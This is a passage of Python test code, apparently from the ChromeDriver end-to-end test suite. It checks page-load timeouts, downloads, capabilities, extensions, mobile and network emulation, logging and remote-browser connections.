def setUp(self): self._handler = ChromeDriverPageLoadTimeoutTest._RequestHandler() self._http_server.SetCallbackForPath('/hang', self._handler.handle) super(ChromeDriverPageLoadTimeoutTest, self).setUp() self._driver = self.CreateDriver( chrome_switches=['host-resolver-rules=MAP * 127.0.0.1']) self._initial_url = self.GetHttpUrlForFile('/chromedriver/empty.html') self._driver.Load(self._initial_url) # When send_response_event is set, navigating to the hang URL takes only # about 0.1 second on Linux and Windows, but takes half a second or longer # on Mac. So we use longer timeout on Mac, 0.5 second on others. timeout = 3000 if util.GetPlatformName() == 'mac' else 500 self._driver.SetTimeouts({'pageLoad': timeout}) def tearDown(self): super(ChromeDriverPageLoadTimeoutTest, self).tearDown() self._http_server.SetCallbackForPath('/hang', None) def _LoadHangingUrl(self, host=None): self._driver.Load(self._http_server.GetUrl(host) + '/hang') def _CheckPageLoadTimeout(self, action): self._handler.request_received_event.clear() timed_out = False try: action() except chromedriver.ChromeDriverException as e: self.assertNotEqual(-1, e.message.find('timeout')) timed_out = True finally: self._handler.send_response_event.set() self.assertTrue(timed_out) # Verify that the browser actually made that request. self.assertTrue(self._handler.request_received_event.wait(1)) def testPageLoadTimeout(self): self._CheckPageLoadTimeout(self._LoadHangingUrl) self.assertEquals(self._initial_url, self._driver.GetCurrentUrl()) def testPageLoadTimeoutCrossDomain(self): # Cross-domain navigation is likely to be a cross-process one. In this case # DevToolsAgentHost behaves quite differently and does not send command # responses if the navigation hangs, so this case deserves a dedicated test. 
    # ('foo.bar' resolves to the local server via the host-resolver-rules
    # switch installed in setUp.)
    self._CheckPageLoadTimeout(lambda: self._LoadHangingUrl('foo.bar'))
    self.assertEquals(self._initial_url, self._driver.GetCurrentUrl())

  def testHistoryNavigationWithPageLoadTimeout(self):
    # Allow the page to load for the first time.
    self._handler.send_response_event.set()
    self._LoadHangingUrl()
    self.assertTrue(self._handler.request_received_event.wait(1))

    self._driver.GoBack()
    self._CheckPageLoadTimeout(self._driver.GoForward)
    self.assertEquals(self._initial_url, self._driver.GetCurrentUrl())

  def testRefreshWithPageLoadTimeout(self):
    # Allow the page to load for the first time.
    self._handler.send_response_event.set()
    self._LoadHangingUrl()
    self.assertTrue(self._handler.request_received_event.wait(1))

    self._CheckPageLoadTimeout(self._driver.Refresh)


class ChromeDriverAndroidTest(ChromeDriverBaseTest):
  """End to end tests for Android-specific tests."""

  def testLatestAndroidAppInstalled(self):
    # Only meaningful for the stable/beta Android packages.
    if ('stable' not in _ANDROID_PACKAGE_KEY and
        'beta' not in _ANDROID_PACKAGE_KEY):
      return

    self._driver = self.CreateDriver()

    try:
      # Compare the on-device Chrome version against the current release
      # version reported by omahaproxy; the device must not be older.
      omaha_list = json.loads(
          six.moves.urllib.request.urlopen(
              'http://omahaproxy.appspot.com/all.json').read())
      for l in omaha_list:
        if l['os'] != 'android':
          continue
        for v in l['versions']:
          if (('stable' in v['channel'] and
               'stable' in _ANDROID_PACKAGE_KEY) or
              ('beta' in v['channel'] and 'beta' in _ANDROID_PACKAGE_KEY)):
            # Compare dotted versions component-wise as integer lists.
            omaha = list(map(int, v['version'].split('.')))
            device = list(map(int,
                self._driver.capabilities['browserVersion'].split('.')))
            self.assertTrue(omaha <= device)
            return
      raise RuntimeError('Malformed omaha JSON')
    except six.moves.urllib.error.URLError as e:
      # Best effort: network failures shouldn't fail the test run.
      print('Unable to fetch current version info from omahaproxy (%s)' % e)

  def testDeviceManagement(self):
    # One driver per healthy device; one more than that must be rejected.
    self._drivers = [self.CreateDriver()
                     for _ in device_utils.DeviceUtils.HealthyDevices()]
    self.assertRaises(chromedriver.UnknownError, self.CreateDriver)
    # Quitting a driver frees its device for a new session.
    self._drivers[0].Quit()
    self._drivers[0] = self.CreateDriver()

  def testAndroidGetWindowSize(self):
    self._driver = self.CreateDriver()
    size = self._driver.GetWindowRect()

    # On Android, window size is the same as screen size (no window chrome).
    script_size = self._driver.ExecuteScript(
        'return [window.outerWidth, window.outerHeight, 0, 0]')
    self.assertEquals(size, script_size)

    script_inner = self._driver.ExecuteScript(
        'return [window.innerWidth * visualViewport.scale, '
        'window.innerHeight * visualViewport.scale]')
    # Subtract inner size by 1 to compensate for rounding errors.
    self.assertLessEqual(script_inner[0] - 1, size[0])
    self.assertLessEqual(script_inner[1] - 1, size[1])
    # Sanity check: screen dimensions in the range 20-20000px
    self.assertLessEqual(size[0], 20000)
    self.assertLessEqual(size[1], 20000)
    self.assertGreaterEqual(size[0], 20)
    self.assertGreaterEqual(size[1], 20)


class ChromeDownloadDirTest(ChromeDriverBaseTest):

  def __init__(self, *args, **kwargs):
    super(ChromeDownloadDirTest, self).__init__(*args, **kwargs)
    # Temp dirs created by tests; cleaned up (with retries) in tearDown.
    self._temp_dirs = []

  def CreateTempDir(self):
    temp_dir = tempfile.mkdtemp()
    self._temp_dirs.append(temp_dir)
    return temp_dir

  def RespondWithCsvFile(self, request):
    # Minimal CSV response; the text/csv type makes Chrome download it.
    return {'Content-Type': 'text/csv'}, 'a,b,c\n1,2,3\n'

  def WaitForFileToDownload(self, path):
    # Poll for up to 60 seconds for the downloaded file to appear.
    deadline = monotonic() + 60
    while True:
      time.sleep(0.1)
      if os.path.isfile(path) or monotonic() > deadline:
        break
    self.assertTrue(os.path.isfile(path), "Failed to download file!")

  def tearDown(self):
    # Call the superclass tearDown() method before deleting temp dirs, so that
    # Chrome has a chance to exit before its user data dir is blown away from
    # underneath it.
    super(ChromeDownloadDirTest, self).tearDown()
    for temp_dir in self._temp_dirs:
      # Deleting temp dir can fail if Chrome hasn't yet fully exited and still
      # has open files in there. So we ignore errors, and retry if necessary.
shutil.rmtree(temp_dir, ignore_errors=True) retry = 0 while retry < 10 and os.path.exists(temp_dir): time.sleep(0.1) shutil.rmtree(temp_dir, ignore_errors=True) def testFileDownloadWithClick(self): download_dir = self.CreateTempDir() download_name = os.path.join(download_dir, 'a_red_dot.png') driver = self.CreateDriver(download_dir=download_dir) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/download.html')) driver.FindElement('css selector', '#red-dot').Click() self.WaitForFileToDownload(download_name) self.assertEqual( ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'), driver.GetCurrentUrl()) def testFileDownloadWithClickHeadless(self): download_dir = self.CreateTempDir() download_name = os.path.join(download_dir, 'a_red_dot.png') driver = self.CreateDriver(download_dir=download_dir, chrome_switches=['--headless']) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/download.html')) driver.FindElement('css selector', '#red-dot').Click() self.WaitForFileToDownload(download_name) self.assertEqual( ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'), driver.GetCurrentUrl()) def testFileDownloadAfterTabHeadless(self): download_dir = self.CreateTempDir() download_name = os.path.join(download_dir, 'a_red_dot.png') driver = self.CreateDriver(download_dir=download_dir, chrome_switches=['--headless']) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/empty.html')) new_window = driver.NewWindow(window_type='tab') driver.SwitchToWindow(new_window['handle']) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/download.html')) driver.FindElement('css selector', '#red-dot').Click() self.WaitForFileToDownload(download_name) self.assertEqual( ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'), driver.GetCurrentUrl()) def testFileDownloadWithGet(self): ChromeDriverTest._http_server.SetCallbackForPath( '/abc.csv', self.RespondWithCsvFile) download_dir = self.CreateTempDir() driver = 
self.CreateDriver(download_dir=download_dir) original_url = driver.GetCurrentUrl() driver.Load(ChromeDriverTest.GetHttpUrlForFile('/abc.csv')) self.WaitForFileToDownload(os.path.join(download_dir, 'abc.csv')) self.assertEqual(original_url, driver.GetCurrentUrl()) def testFileDownloadWithGetHeadless(self): ChromeDriverTest._http_server.SetCallbackForPath( '/abc.csv', self.RespondWithCsvFile) download_dir = self.CreateTempDir() driver = self.CreateDriver(download_dir=download_dir, chrome_switches=['--headless']) original_url = driver.GetCurrentUrl() driver.Load(ChromeDriverTest.GetHttpUrlForFile('/abc.csv')) self.WaitForFileToDownload(os.path.join(download_dir, 'abc.csv')) self.assertEqual(original_url, driver.GetCurrentUrl()) def testDownloadDirectoryOverridesExistingPreferences(self): user_data_dir = self.CreateTempDir() download_dir = self.CreateTempDir() sub_dir = os.path.join(user_data_dir, 'Default') os.mkdir(sub_dir) prefs_file_path = os.path.join(sub_dir, 'Preferences') prefs = { 'test': 'this should not be changed', 'download': { 'default_directory': '/old/download/directory' } } with open(prefs_file_path, 'w') as f: json.dump(prefs, f) driver = self.CreateDriver( chrome_switches=['user-data-dir=' + user_data_dir], download_dir=download_dir) with open(prefs_file_path) as f: prefs = json.load(f) self.assertEqual('this should not be changed', prefs['test']) download = prefs['download'] self.assertEqual(download['default_directory'], download_dir) class ChromeSwitchesCapabilityTest(ChromeDriverBaseTest): """Tests that chromedriver properly processes chromeOptions.args capabilities. Makes sure the switches are passed to Chrome. """ def testSwitchWithoutArgument(self): """Tests that switch --dom-automation can be passed to Chrome. Unless --dom-automation is specified, window.domAutomationController is undefined. 
""" driver = self.CreateDriver(chrome_switches=['dom-automation']) self.assertNotEqual( None, driver.ExecuteScript('return window.domAutomationController')) def testRemoteDebuggingPort(self): """Tests that passing --remote-debugging-port through capabilities works. """ # Must use retries since there is an inherent race condition in port # selection. ports_generator = util.FindProbableFreePorts() for _ in range(3): port = next(ports_generator) port_flag = 'remote-debugging-port=%s' % port try: driver = self.CreateDriver(chrome_switches=[port_flag]) except: continue driver.Load('chrome:version') command_line = driver.FindElement('css selector', '#command_line').GetText() self.assertIn(port_flag, command_line) break else: # Else clause gets invoked if "break" never happens. raise # This re-raises the most recent exception. class ChromeDesiredCapabilityTest(ChromeDriverBaseTest): """Tests that chromedriver properly processes desired capabilities.""" def testDefaultTimeouts(self): driver = self.CreateDriver() timeouts = driver.GetTimeouts() # Compare against defaults in W3C spec self.assertEquals(timeouts['implicit'], 0) self.assertEquals(timeouts['pageLoad'], 300000) self.assertEquals(timeouts['script'], 30000) def testTimeouts(self): driver = self.CreateDriver(timeouts = { 'implicit': 123, 'pageLoad': 456, 'script': 789 }) timeouts = driver.GetTimeouts() self.assertEquals(timeouts['implicit'], 123) self.assertEquals(timeouts['pageLoad'], 456) self.assertEquals(timeouts['script'], 789) # Run in Legacy mode def testUnexpectedAlertBehaviourLegacy(self): driver = self.CreateDriver(unexpected_alert_behaviour="accept", send_w3c_capability=False, send_w3c_request=False) self.assertEquals("accept", driver.capabilities['unexpectedAlertBehaviour']) driver.ExecuteScript('alert("HI");') self.WaitForCondition(driver.IsAlertOpen) self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen, 'unexpected alert open: {Alert text : HI}', driver.FindElement, 'tag name', 'div') 
    # The "accept" behaviour dismissed the alert before raising above.
    self.assertFalse(driver.IsAlertOpen())

  def testUnexpectedAlertBehaviourW3c(self):
    driver = self.CreateDriver(unexpected_alert_behaviour='accept',
                               send_w3c_capability=True,
                               send_w3c_request=True)
    self.assertEquals('accept',
                      driver.capabilities['unhandledPromptBehavior'])
    driver.ExecuteScript('alert("HI");')
    self.WaitForCondition(driver.IsAlertOpen)
    # With unhandledPromptBehavior=accept, calling GetTitle (and most other
    # endpoints) automatically dismisses the alert, so IsAlertOpen() becomes
    # False afterwards.
    self.assertEquals(driver.GetTitle(), '')
    self.assertFalse(driver.IsAlertOpen())


class ChromeExtensionsCapabilityTest(ChromeDriverBaseTestWithWebServer):
  """Tests that chromedriver properly processes chromeOptions.extensions."""

  def _PackExtension(self, ext_path):
    # Extensions are passed over the wire as base64-encoded file contents.
    # NOTE(review): the file handle from open() is never closed explicitly;
    # harmless in CPython tests but worth a `with` block.
    return base64.b64encode(open(ext_path, 'rb').read())

  def testExtensionsInstall(self):
    """Checks that chromedriver can take the extensions in crx format."""
    crx_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.crx')
    crx_2 = os.path.join(_TEST_DATA_DIR, 'ext_test_2.crx')
    self.CreateDriver(chrome_extensions=[self._PackExtension(crx_1),
                                         self._PackExtension(crx_2)])

  def testExtensionsInstallZip(self):
    """Checks that chromedriver can take the extensions in zip format."""
    zip_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.zip')
    self.CreateDriver(chrome_extensions=[self._PackExtension(zip_1)])

  def testCanInspectBackgroundPage(self):
    # windowTypes must include 'background_page' for the generated background
    # page to show up among the window handles.
    crx = os.path.join(_TEST_DATA_DIR, 'ext_bg_page.crx')
    driver = self.CreateDriver(
        chrome_extensions=[self._PackExtension(crx)],
        experimental_options={'windowTypes': ['background_page']})
    handles = driver.GetWindowHandles()
    for handle in handles:
      driver.SwitchToWindow(handle)
      if driver.GetCurrentUrl() == 'chrome-extension://' \
          'nibbphkelpaohebejnbojjalikodckih/_generated_background_page.html':
        self.assertEqual(42, driver.ExecuteScript('return magic;'))
        return
    self.fail("couldn't find generated background page for test extension")

  def testIFrameWithExtensionsSource(self):
    crx_path = os.path.join(_TEST_DATA_DIR, 'frames_extension.crx')
    driver = self.CreateDriver(
        chrome_extensions=[self._PackExtension(crx_path)])
    driver.Load(
        ChromeDriverTest._http_server.GetUrl() +
        '/chromedriver/iframe_extension.html')
    driver.SwitchToFrame('testframe')
    element = driver.FindElement('css selector', '#p1')
    self.assertEqual('Its a frame with extension source', element.GetText())

  def testDontExecuteScriptsInContentScriptContext(self):
    # This test extension has a content script which runs in all frames (see
    # https://developer.chrome.com/extensions/content_scripts) which causes
    # each frame on the page to be associated with multiple JS execution
    # contexts. Make sure that ExecuteScript operates on the page's context,
    # rather than the extension's content script's one.
    extension_path = os.path.join(_TEST_DATA_DIR, 'all_frames')
    driver = self.CreateDriver(
        chrome_switches=['load-extension=%s' % extension_path])
    driver.Load(
        ChromeDriverTest._http_server.GetUrl() + '/chromedriver/container.html')
    driver.SwitchToMainFrame()
    self.assertEqual('one', driver.ExecuteScript("return window['global_var']"))
    driver.SwitchToFrame('iframe')
    self.assertEqual('two', driver.ExecuteScript("return window['iframe_var']"))


class ChromeLogPathCapabilityTest(ChromeDriverBaseTest):
  """Tests that chromedriver properly processes chromeOptions.logPath."""

  LOG_MESSAGE = 'Welcome to ChromeLogPathCapabilityTest!'

  def testChromeLogPath(self):
    """Checks that user can specify the path of the chrome log.

    Verifies that a log message is written into the specified log file.
    """
    tmp_log_path = tempfile.NamedTemporaryFile()
    driver = self.CreateDriver(chrome_log_path=tmp_log_path.name)
    driver.ExecuteScript('console.info("%s")' % self.LOG_MESSAGE)
    # Quit first so the log is flushed before we read it back.
    driver.Quit()
    self.assertTrue(self.LOG_MESSAGE in open(tmp_log_path.name).read())


class MobileEmulationCapabilityTest(ChromeDriverBaseTestWithWebServer):
  """Tests that ChromeDriver processes chromeOptions.mobileEmulation.
  Makes sure the device metrics are overridden in DevTools and user agent is
  overridden in Chrome.
  """

  # Run in Legacy mode
  def testDeviceMetricsWithStandardWidth(self):
    # Explicit deviceMetrics take effect regardless of the browser window
    # size set below.
    driver = self.CreateDriver(
        send_w3c_capability=False, send_w3c_request=False,
        mobile_emulation = {
            'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
            'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
                         'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
                         'ome/18.0.1025.166 Mobile Safari/535.19'
            })
    driver.SetWindowRect(600, 400, None, None)
    driver.Load(self._http_server.GetUrl() + '/userAgent')
    self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
    self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
    self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))

  # Run in Legacy mode
  def testDeviceMetricsWithDeviceWidth(self):
    driver = self.CreateDriver(
        send_w3c_capability=False, send_w3c_request=False,
        mobile_emulation = {
            'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
            'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
                         'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
                         'ome/18.0.1025.166 Mobile Safari/535.19'
            })
    driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
    self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
    self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
    self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))

  def testUserAgent(self):
    # The /userAgent endpoint echoes the request's User-Agent header into
    # the page body.
    driver = self.CreateDriver(
        mobile_emulation = {'userAgent': 'Agent Smith'})
    driver.Load(self._http_server.GetUrl() + '/userAgent')
    body_tag = driver.FindElement('tag name', 'body')
    self.assertEqual("Agent Smith", body_tag.GetText())

  def testDeviceName(self):
    # A known deviceName implies both device metrics and user agent.
    driver = self.CreateDriver(
        mobile_emulation = {'deviceName': 'Nexus 5'})
    driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
    self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
    self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
    body_tag = driver.FindElement('tag name', 'body')
    # Only the Chrome version varies between builds, so match it loosely.
    self.assertRegexpMatches(
        body_tag.GetText(),
        '^' +
        re.escape('Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) '
                  'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/') +
        r'\d+\.\d+\.\d+\.\d+' +
        re.escape(' Mobile Safari/537.36') + '$')

  def testSendKeysToElement(self):
    driver = self.CreateDriver(
        mobile_emulation = {'deviceName': 'Nexus 5'})
    text = driver.ExecuteScript(
        'document.body.innerHTML = \'<input type="text">\';'
        'var input = document.getElementsByTagName("input")[0];'
        'input.addEventListener("change", function() {'
        '  document.body.appendChild(document.createElement("br"));'
        '});'
        'return input;')
    text.SendKeys('0123456789+-*/ Hi')
    text.SendKeys(', there!')
    value = driver.ExecuteScript('return arguments[0].value;', text)
    self.assertEquals('0123456789+-*/ Hi, there!', value)

  def testClickElement(self):
    driver = self.CreateDriver(
        mobile_emulation = {'deviceName': 'Nexus 5'})
    driver.Load('about:blank')
    div = driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.addEventListener("click", function() {'
        '  div.innerHTML="new<br>";'
        '});'
        'return div;')
    div.Click()
    self.assertEquals(1, len(driver.FindElements('tag name', 'br')))

  # Run in Legacy mode
  def testTapElement(self):
    # Under mobile emulation a tap produces touch events ("touchstart").
    driver = self.CreateDriver(
        send_w3c_capability=False, send_w3c_request=False,
        mobile_emulation = {'deviceName': 'Nexus 5'})
    driver.Load('about:blank')
    div = driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.addEventListener("touchstart", function() {'
        '  div.innerHTML="new<br>";'
        '});'
        'return div;')
    div.SingleTap()
    self.assertEquals(1, len(driver.FindElements('tag name', 'br')))

  def testNetworkConnectionDisabledByDefault(self):
    driver = self.CreateDriver()
    self.assertFalse(driver.capabilities['networkConnectionEnabled'])
def testNetworkConnectionUnsupported(self): driver = self.CreateDriver() # Network connection capability must be enabled to set/retrieve self.assertRaises(chromedriver.UnknownError, driver.GetNetworkConnection) self.assertRaises(chromedriver.UnknownError, driver.SetNetworkConnection, 0x1) # Run in Legacy mode def testNetworkConnectionEnabled(self): # mobileEmulation must be enabled for networkConnection to be enabled driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True, send_w3c_capability=False, send_w3c_request=False) self.assertTrue(driver.capabilities['mobileEmulationEnabled']) self.assertTrue(driver.capabilities['networkConnectionEnabled']) def testEmulateNetworkConnection4g(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Test 4G connection. connection_type = 0x8 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testEmulateNetworkConnectionMultipleBits(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Connection with 4G, 3G, and 2G bits on. # Tests that 4G takes precedence. connection_type = 0x38 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testWifiAndAirplaneModeEmulation(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Connection with both Wifi and Airplane Mode on. # Tests that Wifi takes precedence over Airplane Mode. 
connection_type = 0x3 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testNetworkConnectionTypeIsAppliedToAllTabsImmediately(self): def respondWithString(request): return {}, """ <html> <body>%s</body> </html>""" % "hello world!" self._http_server.SetCallbackForPath( '/helloworld', respondWithString) driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Set network to online connection_type = 0x10 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) # Open a window with two divs counting successful + unsuccessful # attempts to complete XML task driver.Load( self._http_server.GetUrl() +'/chromedriver/xmlrequest_test.html') window1_handle = driver.GetCurrentWindowHandle() old_handles = driver.GetWindowHandles() driver.FindElement('css selector', '#requestButton').Click() driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(driver, old_handles) self.assertNotEqual(None, new_window_handle) driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, driver.GetCurrentWindowHandle()) # Set network to offline to determine whether the XML task continues to # run in the background, indicating that the conditions are only applied # to the current WebView connection_type = 0x1 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) driver.SwitchToWindow(window1_handle) connection_type = 0x1 def testNetworkConnectionTypeIsAppliedToAllTabs(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) driver.Load(self._http_server.GetUrl() +'/chromedriver/page_test.html') window1_handle = driver.GetCurrentWindowHandle() old_handles = driver.GetWindowHandles() # Test connection 
is offline. connection_type = 0x1; returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) # Navigate to another window. driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(driver, old_handles) self.assertNotEqual(None, new_window_handle) driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, driver.GetCurrentWindowHandle()) self.assertRaises( chromedriver.NoSuchElement, driver.FindElement, 'css selector', '#link') # Set connection to 3G in second window. connection_type = 0x10; returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) driver.SwitchToWindow(window1_handle) self.assertEquals(window1_handle, driver.GetCurrentWindowHandle()) # Test whether first window has old or new network conditions. network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testDefaultComplianceMode(self): driver = self.CreateDriver(send_w3c_capability=None, send_w3c_request=True) self.assertTrue(driver.w3c_compliant) def testW3cCompliantResponses(self): # It's an error to send Legacy format request # without Legacy capability flag. with self.assertRaises(chromedriver.InvalidArgument): self.CreateDriver(send_w3c_request=False) # It's an error to send Legacy format capability # without Legacy request flag. with self.assertRaises(chromedriver.SessionNotCreated): self.CreateDriver(send_w3c_capability=False) # Can enable W3C capability in a W3C format request. driver = self.CreateDriver(send_w3c_capability=True) self.assertTrue(driver.w3c_compliant) # Can enable W3C request in a legacy format request. driver = self.CreateDriver(send_w3c_request=True) self.assertTrue(driver.w3c_compliant) # Asserts that errors are being raised correctly in the test client # with a W3C compliant driver. 
self.assertRaises(chromedriver.UnknownError, driver.GetNetworkConnection) # Can set Legacy capability flag in a Legacy format request. driver = self.CreateDriver(send_w3c_capability=False, send_w3c_request=False) self.assertFalse(driver.w3c_compliant) class ChromeDriverLogTest(ChromeDriverBaseTest): """Tests that chromedriver produces the expected log file.""" UNEXPECTED_CHROMEOPTION_CAP = 'unexpected_chromeoption_capability' LOG_MESSAGE = 'unrecognized chrome option: %s' % UNEXPECTED_CHROMEOPTION_CAP def testChromeDriverLog(self): _, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_') chromedriver_server = server.Server( _CHROMEDRIVER_BINARY, log_path=tmp_log_path) try: driver = chromedriver.ChromeDriver( chromedriver_server.GetUrl(), chromedriver_server.GetPid(), chrome_binary=_CHROME_BINARY, experimental_options={ self.UNEXPECTED_CHROMEOPTION_CAP : 1 }) driver.Quit() except chromedriver.ChromeDriverException as e: self.assertTrue(self.LOG_MESSAGE in e.message) finally: chromedriver_server.Kill() with open(tmp_log_path, 'r') as f: self.assertTrue(self.LOG_MESSAGE in f.read()) def testDisablingDriverLogsSuppressesChromeDriverLog(self): _, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_') chromedriver_server = server.Server( _CHROMEDRIVER_BINARY, log_path=tmp_log_path, verbose=False) try: driver = self.CreateDriver( chromedriver_server.GetUrl(), logging_prefs={'driver':'OFF'}) driver.Load( ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html') driver.AddCookie({'name': 'secret_code', 'value': 'bosco'}) driver.Quit() finally: chromedriver_server.Kill() with open(tmp_log_path, 'r') as f: self.assertNotIn('bosco', f.read()) class ChromeLoggingCapabilityTest(ChromeDriverBaseTest): """Tests chromedriver tracing support and Inspector event collection.""" def testPerformanceLogger(self): driver = self.CreateDriver( experimental_options={'perfLoggingPrefs': { 'traceCategories': 'blink.console' }}, logging_prefs={'performance':'ALL'}) 
driver.Load( ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html') # Mark the timeline; later we will verify the marks appear in the trace. driver.ExecuteScript('console.time("foobar")') driver.ExecuteScript('console.timeEnd("foobar")') logs = driver.GetLog('performance') driver.Quit() marked_timeline_events = [] seen_log_domains = {} for entry in logs: devtools_message = json.loads(entry['message'])['message'] method = devtools_message['method'] domain = method[:method.find('.')] seen_log_domains[domain] = True if method != 'Tracing.dataCollected': continue self.assertTrue('params' in devtools_message) self.assertTrue(isinstance(devtools_message['params'], dict)) cat = devtools_message['params'].get('cat', '') if (cat == 'blink.console' and devtools_message['params']['name'] == 'foobar'): marked_timeline_events.append(devtools_message) self.assertEquals(2, len(marked_timeline_events)) self.assertEquals({'Network', 'Page', 'Tracing'}, set(seen_log_domains.keys())) def testDevToolsEventsLogger(self): """Tests that the correct event type (and no other) is logged""" event = 'Page.loadEventFired' driver = self.CreateDriver( devtools_events_to_log=[event], logging_prefs={'devtools':'ALL'}) driver.Load('about:blank') logs = driver.GetLog('devtools') for entry in logs: devtools_message = json.loads(entry['message']) method = devtools_message['method'] self.assertTrue('params' in devtools_message) self.assertEquals(event, method) class SessionHandlingTest(ChromeDriverBaseTest): """Tests for session operations.""" def testQuitASessionMoreThanOnce(self): driver = self.CreateDriver() driver.Quit() driver.Quit() def testGetSessions(self): driver = self.CreateDriver() response = driver.GetSessions() self.assertEqual(1, len(response)) driver2 = self.CreateDriver() response = driver2.GetSessions() self.assertEqual(2, len(response)) class RemoteBrowserTest(ChromeDriverBaseTest): """Tests for ChromeDriver remote browser capability.""" def setUp(self): 
self.assertTrue(_CHROME_BINARY is not None, 'must supply a chrome binary arg') def testConnectToRemoteBrowser(self): # Must use retries since there is an inherent race condition in port # selection. ports_generator = util.FindProbableFreePorts() for _ in range(3): port = next(ports_generator) temp_dir = util.MakeTempDir() print('temp dir is ' + temp_dir) cmd = [_CHROME_BINARY, '--remote-debugging-port=%d' % port, '--user-data-dir=%s' % temp_dir, '--use-mock-keychain'] process = subprocess.Popen(cmd) try: driver = self.CreateDriver(debugger_address='localhost:%d' % port) driver.ExecuteScript('console.info("%s")' % 'connecting at %d!' % port) driver.Quit() except: continue finally: if process.poll() is None: process.terminate() # Wait for Chrome to exit here to prevent a race with Chrome to # delete/modify the temporary user-data-dir. # Maximum wait ~1 second. for _ in range(20): if process.poll() is not None: break print('continuing to wait for Chrome to exit') time.sleep(.05) else: process.kill() break else: # Else clause gets invoked if "break" never happens. raise # This re-raises the most recent exception. def testConnectToRemoteBrowserLiteralAddressHeadless(self): debug_addrs = ['127.0.0.1', '::1'] debug_url_addrs = ['127.0.0.1', '[::1]'] for (debug_addr, debug_url_addr) in zip(debug_addrs, debug_url_addrs): # Must use retries since there is an inherent race condition in port # selection. ports_generator = util.FindProbableFreePorts() for _ in range(3): port = next(ports_generator) temp_dir = util.MakeTempDir() print('temp dir is ' + temp_dir) cmd = [_CHROME_BINARY, '--headless', '--remote-debugging-address=%s' % debug_addr, '--remote-debugging-port=%d' % port, '--user-data-dir=%s' % temp_dir, '--use-mock-keychain'] process = subprocess.Popen(cmd) try: driver = self.CreateDriver( debugger_address='%s:%d' % (debug_url_addr, port)) driver.ExecuteScript( 'console.info("%s")' % 'connecting at %d!' 
